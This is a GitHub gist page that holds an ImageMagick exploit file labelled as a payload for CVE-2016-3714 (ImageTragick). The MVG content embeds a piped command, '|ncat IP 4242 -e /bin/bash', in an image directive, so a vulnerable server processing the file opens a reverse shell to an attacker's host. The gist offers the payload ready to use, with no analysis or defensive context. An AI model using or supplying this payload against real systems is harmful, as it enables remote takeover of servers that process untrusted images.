Skip to content

Instantly share code, notes, and snippets.

@tutozz
Created May 3, 2024 12:27
Show Gist options
  • Save tutozz/513f2648612db8932ebfb9d0556e44e0 to your computer and use it in GitHub Desktop.
Save tutozz/513f2648612db8932ebfb9d0556e44e0 to your computer and use it in GitHub Desktop.
ImageMagick-6.9.3-9 CVE-2016–3714 RCE Payload
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|ncat IP 4242 -e /bin/bash'
pop graphic-context
pop graphic-context
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment